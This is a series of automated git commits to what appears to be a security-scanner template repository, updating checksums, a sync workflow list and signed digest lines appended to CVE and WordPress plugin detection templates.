+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5d684f1d08b99fe24149050622a3f6ff1ca6a53a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8946,7 +8947,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a3ea9eb00c30bbf5b2abb8425182ddd14ad792fc +templates-checksum.txt:fecee26ddf922dc3ce7a040004bd1d0c6585c416 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From f2dabf64f833c85dc189beb5c10272ddba8ffe09 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 05:36:40 +0000 Subject: [PATCH 11/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a12fe4daf4..49bc9c58b0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6396.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' + - 'http/cves/2024/CVE-2024-7120.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' From 31be8581f7d7d6594e1fcce7fc5f46fc7e0e346a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 05:37:35 +0000 Subject: [PATCH 12/46] Auto Template Signing [Thu Aug 1 05:37:35 UTC 2024] :robot: --- http/cves/2024/CVE-2024-39907.yaml | 1 + http/cves/2024/CVE-2024-7120.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 202 files changed, 202 insertions(+) diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index 0338b96fb1..b0d3b12ee9 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -49,3 +49,4 @@ http: - contains_all(body_2, "SQL logic error","table exp already exists") - contains(header_1, 'psession') condition: and +# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index c874785be6..77db25b31b 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -43,3 +43,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f825ff9aa104f675a7d11ac402b1eb594688591c3cef8dbab4feb41cc065f415022100b74ba964b5441d9580eb432a280ebcd4128fe1cf70e37b61e6855f8405877bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..50b5926d79 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb21c1a47541da16e8bda0d6b7655bac6e4c0501f14293739586047952f741cb0221008e68d88a15b4ea97a4744ffe7ef8235a34b0f2a3e08df42d3e886a9030ee1a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..e9441db46a 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a96ab15ddb89d8065dbf2aaaab430e20d82439033be26c342aaa13ab6b30485d022100d2bebd77742fa09a8178c6ea4cb0434ae71bdd06dbb16aa64844ed35d5909f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..edbdb7eb55 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f666e6fd4c4a8dc99c92bda47f10e36a8558d666e8eb895a83e1636f89a6a87602200ed373b3a15fe11b1b58d67abaa577d8f8d2f76ed38931c60ea172cc708af9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..444d98e59c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015e0aa337a86699ec98fe00b80b4f3f2f53e8f5a5a86dc2221c348e4f3037db40221008cea985c8f92186bcbf6605558c8fdb9200d9426692101f40ae95ef239c4722b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..292c97c440 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220554eff996af197cd8fbfd6eeefb3959e5dffb907a99939dda5ee543908619b51022024e9187952242074e1cf7995bade104c2496b7cf711f118003a04fd33b349692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..5ff3801337 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e044b71e883a3edb2bc724d1c8d2a269d27475c212d844d67fb85a82eb03ba1c022100e2cd7e62585b6363649103f00656850fb4b03a709c07a41a47bd2995787ba4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..32c05e8835 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069ffa28f501d1c8c8bc5c2b0ffca5f5712212f3038cd905e9ef62ec94cd792fe02203d6333298e0a1bca424dfb676ea314fb79747549696d2382fd7df8dae793da16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..79ffff7131 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201888151a74948f6f450782d958e7c94aa6fdbd464334df3f38556d6a0c0493d202207340a2f97036e32848bcd2d158b9ab58e451b9bdbc9e99091a6b1393ab29bd9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..bfc5b23669 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200cfd7ea8d09607ce19cb3acc996f8edf04c248af9219f5179981f18cfc58e67b02204617673cd30134d4eb6009ff9dc057e466ab06d1c0937a1a936504a11346655d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..9447eefce5 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053629a1f8dbc2129095bc0c59e624420cf6f9e58fc895f6282ef1b6868d0448c02204be07a1b073c13687090a44dec6d0885d4a863cc2313d50a6706037a6e8259bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..b713b9dfcf 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204090c001c08407db2736b0c1bce27aeef80dd07e6b0bc19ed3f9591889e52d1102206f71b893e4efaaf9780e9c761a836e372aa8951fbc6f019e5aef9ae9a6f159ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..0adacf7104 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2ac2c5c4018dbc04d013e7dd6d6329aed676865ef8daf43a4f4b9051ea72721022004f0f4abb9a29928fda90d6ef7c47fba4c9b83961dc300901fa03106a2677ac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..bd73e21040 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220166a059abad47d7810570e6774f74158bf750b6709c96a77756130e70d29cbb2022100bf66279eb5123f8cecc13dd1ed4087eeeb0d072eaffaa41977a70cc829785c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..ff9f8a3c3d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017ee505dcca18ebab680043b9925f57984d15f24be30f3f0ec870f6a7dceeca8022100abfbd24fce7dae963b3ed486a507e06d30ba8df3471283206e59a6eca66a25e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..6d1ea5b32d 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204016d00b414a89aa5ee3e46fd9bf70b4e6e52f59a21d6c051a3649b5ddcc3e6e022100a287c6b188915ed6124a9a1d037cfa445780b9e261d0d4dba376f3f2905f6a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..2d65493ac7 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb0d6a1c264fd9f2133b11d868175b69427130562ffeda26f311e59499c31ff602204560a3e5ec893280c5d927554304b0ef9a401f8f515662c0c8853b675f89956d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..da8732fc6a 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d6a1f77e361161159079a8c9808d996b8f300de6e7f9879c44b7a5fcbaa754c70220549f66c482dc25ce5859081734f6859d254dcb5e1faf2a50059fb884d889a3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..f34dc09462 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc067167944e4479be804de00ef189955c02218d61594796a5528c5f14efbeeb022100cc886ea0fd38c9f26a26735b898b0e92d2664441cf3da7f97fbe0a0781348354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..b53a37add5 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012e44aec7725638cd18ee6ca09389a5b8a098851e09d76c0c61463e5ef87dae2022100c5cd95f4d634e51f124e0b09cdeb6f6d59c56a90a1375be8dcc0b966437f6102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..cd574719af 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a7409f7c925e71550c67e07908d0b5984127972a2d98e5f0a71db575e87482b022100e7b8b47bdfc6245558f4e851998901f5eee2ba79bf99f77e4bcaa77c1dd32e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..e1c9a3edc0 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 